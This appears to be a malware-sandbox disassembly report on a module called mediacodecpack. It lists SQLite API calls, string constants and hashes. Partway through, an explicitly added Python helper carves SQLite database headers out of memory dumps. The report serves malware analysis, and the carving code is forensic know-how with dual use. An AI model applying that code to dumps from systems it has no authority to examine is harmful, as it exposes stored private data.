                                                                                        • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                        • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                        • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                        • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                        APIs
                                                                                          • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                          • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                          • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                          • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                          • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                          • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                          • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                        • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                        • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                        • sqlite3_free.SQLITE3 ref: 60960618
                                                                                        • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                        • String ID: offsets
                                                                                        • API String ID: 463808202-2642679573
                                                                                        • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                        • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                        • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                        • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                        • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                        • String ID:
                                                                                        • API String ID: 2903785150-0
                                                                                        • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                        • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                        • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                        • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 423083942-0
                                                                                        • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                        • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                                                        • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                        • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                        • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                        • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                        • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                        • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                        • String ID:
                                                                                        • API String ID: 3556715608-0
                                                                                        • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                        • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                        • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                        • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                                        • sqlite3_exec.SQLITE3 ref: 6095F686
                                                                                          • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                        • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                                                          • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                          • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                                        • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                                        • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                                        • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1866449048-0
                                                                                        • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                        • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                                        • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                        • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                                        APIs
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407B4
                                                                                          • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                                          • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407C2
                                                                                          • Part of subcall function 6094064B: sqlite3_mutex_enter.SQLITE3 ref: 609406A7
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407D0
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407DE
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407EC
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609407FA
                                                                                        • sqlite3_finalize.SQLITE3 ref: 60940808
                                                                                        • sqlite3_finalize.SQLITE3 ref: 60940816
                                                                                        • sqlite3_finalize.SQLITE3 ref: 60940824
                                                                                        • sqlite3_free.SQLITE3 ref: 6094082C
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_finalize$sqlite3_logsqlite3_mutex_enter$sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 14011187-0
                                                                                        • Opcode ID: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                                        • Instruction ID: 14c977e837db455c9c1ce3b69ce7d4e0fb0da6313972e550a4586d0eb1b189ee
                                                                                        • Opcode Fuzzy Hash: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                                        • Instruction Fuzzy Hash: F7116774504B008BCB50BF78C9C965877E9AFB5308F061978EC8A8F306EB34D4918B15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                        • API String ID: 0-780898
                                                                                        • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                        • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                        • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                        • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
Strings
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID:
• String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
• API String ID: 0-2604012851
• Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
• Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
• Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
• Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: memcmp$sqlite3_logsqlite3_mutex_try
• String ID: 0$SQLite format 3
• API String ID: 3174206576-3388949527
• Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
• Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
• Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
• Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
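The function above compares a buffer against the SQLite magic string "SQLite format 3" with memcmp, which is the database-header validation of the SQLite library statically linked into the dumped mediacodecpack module at 0x60900000, and the earlier entry's reversed tokens (aolf, bolb, bolc, buod, laer, rahc, tni, txet) are the 32-bit type-name constants of SQLite's sqlite3AffinityType, such as ('c'<<24)+('h'<<16)+('a'<<8)+'r', appearing as little-endian immediates in a string listing. The following Python helpers are an added example for triaging such a dump; they are not part of the Joe Sandbox report or of the sample. They carve and sanity-check SQLite database headers from a raw memory dump and decode reversed immediate strings. The function names, the sample dump and its header values are constructed for this example.

```python
"""Added example (not from the Joe Sandbox report): carve SQLite database
headers out of a process memory dump and decode reversed 32-bit string
immediates.  The sample dump at the bottom is constructed, not real data."""
import struct
from typing import Optional

SQLITE_MAGIC = b"SQLite format 3\x00"   # 16-byte header magic checked by memcmp
HEADER_LEN = 100                        # SQLite file header is always 100 bytes
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def parse_sqlite_header(buf: bytes) -> Optional[dict]:
    """Parse a 100-byte SQLite file header; return None unless it is sane."""
    if len(buf) < HEADER_LEN or buf[:16] != SQLITE_MAGIC:
        return None
    # Offsets 16..72: u16 page size, six u8 flags, then twelve big-endian u32s.
    fields = struct.unpack(">H6B12I", buf[16:72])
    page_size = 65536 if fields[0] == 1 else fields[0]   # value 1 encodes 65536
    write_ver, read_ver, reserved, max_frac, min_frac, leaf_frac = fields[1:7]
    (change_counter, db_pages, freelist_trunk, freelist_count, schema_cookie,
     schema_format, cache_size, largest_root, encoding, user_version,
     incr_vacuum, app_id) = fields[7:19]
    version_valid_for, sqlite_version = struct.unpack(">II", buf[92:100])
    # Sanity rules from the file-format spec: power-of-two page size in
    # [512, 65536], fixed payload fractions 64/32/32, and a known text encoding.
    if not (512 <= page_size <= 65536 and (page_size & (page_size - 1)) == 0):
        return None
    if (max_frac, min_frac, leaf_frac) != (64, 32, 32):
        return None
    if encoding not in ENCODINGS:
        return None
    return {
        "page_size": page_size,
        "db_pages": db_pages,
        "db_size": page_size * db_pages,      # bytes to carve after the offset
        "encoding": ENCODINGS[encoding],
        "schema_cookie": schema_cookie,
        "user_version": user_version,
        "application_id": app_id,
        "sqlite_version": sqlite_version,     # SQLITE_VERSION_NUMBER of last writer
        "write_version": write_ver,
        "read_version": read_ver,
        "reserved_per_page": reserved,
    }


def carve_sqlite_headers(dump: bytes) -> list:
    """Return (offset, header) for every sane SQLite header found in a dump."""
    found = []
    pos = dump.find(SQLITE_MAGIC)
    while pos != -1:
        hdr = parse_sqlite_header(dump[pos:pos + HEADER_LEN])
        if hdr is not None:
            found.append((pos, hdr))
        pos = dump.find(SQLITE_MAGIC, pos + 1)
    return found


def decode_le32_literals(ida_strings: str) -> list:
    """Reverse each '$'-separated token of an IDA string listing.  A compare
    against ('c'<<24)+('h'<<16)+('a'<<8)+'r' is stored little-endian and is
    listed as 'rahc'; reversing it gives the readable 'char'."""
    return [tok[::-1] for tok in ida_strings.split("$") if tok]


def build_header(page_size=4096, db_pages=3, encoding=1, sqlite_version=3045000) -> bytes:
    """Constructed sample header (not from the report) for offline testing."""
    body = struct.pack(">H6B12I", 1 if page_size == 65536 else page_size,
                       1, 1, 0, 64, 32, 32,
                       7, db_pages, 0, 0, 2, 4, 0, 0, encoding, 0, 0, 0)
    tail = struct.pack(">II", 7, sqlite_version)
    return SQLITE_MAGIC + body + bytes(20) + tail   # 16 + 56 + 20 + 8 = 100 bytes


# Constructed dump: junk, one valid database, then a magic string followed by
# garbage (page size 0xffff) that must be rejected by the sanity checks.
SAMPLE_DUMP = (b"\x00" * 37 + build_header() + b"\x00" * (4096 * 3)
               + SQLITE_MAGIC + b"\xff" * 84 + b"junk")

if __name__ == "__main__":
    for off, hdr in carve_sqlite_headers(SAMPLE_DUMP):
        print(f"SQLite header at 0x{off:x}: {hdr}")
    print(decode_le32_literals("aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet"))
```

Run it against a real .sdmp from the report by reading the file into `carve_sqlite_headers`; the returned `db_size` tells you how many bytes to carve from the offset before opening the result with the sqlite3 module.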
APIs
• sqlite3_value_text.SQLITE3 ref: 6095F030
• sqlite3_value_text.SQLITE3 ref: 6095F03E
• sqlite3_stricmp.SQLITE3 ref: 6095F0B3
• sqlite3_free.SQLITE3 ref: 6095F180
  • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
  • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
• sqlite3_free.SQLITE3 ref: 6095F1BD
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
• sqlite3_result_error_code.SQLITE3 ref: 6095F34E
Strings
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
• String ID: |
• API String ID: 1576672187-2343686810
• Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
• Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
• Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
• Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
APIs
• sqlite3_file_control.SQLITE3 ref: 609537BD
• sqlite3_free.SQLITE3 ref: 60953842
• sqlite3_free.SQLITE3 ref: 6095387C
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
• sqlite3_stricmp.SQLITE3 ref: 609538D4
Strings
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_file_controlsqlite3_mutex_entersqlite3_stricmp
• String ID: 6$timeout
• API String ID: 2671017102-3660802998
• Opcode ID: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
• Instruction ID: da3e9078838fdf1f068eeacc94130b5fe058058c2a53432068b0843c8cdd1fdd
• Opcode Fuzzy Hash: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
• Instruction Fuzzy Hash: 6CA11270A083198BDB15CF6AC88079EBBF6BFA9304F10846DE8589B354D774D885CF41
APIs
• sqlite3_snprintf.SQLITE3 ref: 6095D450
  • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
• sqlite3_snprintf.SQLITE3 ref: 6095D4A1
• sqlite3_snprintf.SQLITE3 ref: 6095D525
Strings
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_snprintf$sqlite3_vsnprintf
• String ID: $)><$sqlite_master$sqlite_temp_master
• API String ID: 652164897-1572359634
• Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
• Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
• Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
• Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
APIs
• sqlite3_value_text.SQLITE3 ref: 6091B06E
• sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
• sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
